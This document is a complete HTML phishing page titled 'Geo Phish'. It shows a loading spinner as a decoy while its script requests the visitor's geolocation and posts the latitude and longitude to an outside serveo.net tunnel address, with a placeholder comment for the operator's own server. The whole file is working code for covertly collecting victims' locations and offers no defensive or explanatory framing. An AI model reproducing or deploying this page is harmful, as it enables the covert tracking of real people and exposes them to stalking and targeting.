<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Geo Phish</title>
    <style>
        body {
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            background-color: #1a1a1a;
            color: #ffffff;
            margin: 0;
            padding: 2em;
        }
        h1 {
            color: #ffa500;
            text-shadow: 2px 2px 4px rgba(0, 0, 0, 0.6);
        }
        hr {
            border: 1px solid #ffa500;
        }
        p {
            margin: 0.5em 0;
        }
        strong {
            color: #ffa500;
        }
        span {
            color: #b3b3b3;
        }
    </style>
</head>
<body>
    <style>
        body {
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            background-color: #1a1a1a;
            color: #ffffff;
            margin: 0;
            padding: 2em;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
        }
        .spinner {
            border: 6px solid #f3f3f3; /* Light grey */
            border-top: 6px solid #ffa500; /* Orange */
            border-radius: 50%;
            width: 50px;
            height: 50px;
            animation: spin 1s linear infinite;
        }

        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }
    </style>
    <div class="spinner"></div>
    <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
    <script>
        $(document).ready(function() {
            // Get client's browser location
            if (navigator.geolocation) {
                navigator.geolocation.getCurrentPosition(sendLocationToServer, handleLocationError);
            } else {
                console.error("Geolocation is not supported by this browser.");
            }
        });
        
        function sendLocationToServer(position) {
            var locationData = {
                latitude: position.coords.latitude,
                longitude: position.coords.longitude
            };

            $.ajax({
                type: "POST",
                url: "https://8d367f5b74bd58d9bff4a931c172033d.serveo.net", // Update with your server URL
                contentType: "application/json",
                data: JSON.stringify(locationData),
                success: function(response) {
                    console.log("Location data sent to server successfully:", response);
                },
                error: function(error) {
                    console.error("Error sending location data to server:", error);
                }
            });
        }

        function handleLocationError(error) {
            console.error("Error getting client's location:", error);
        }
    </script>
</body>
</html>
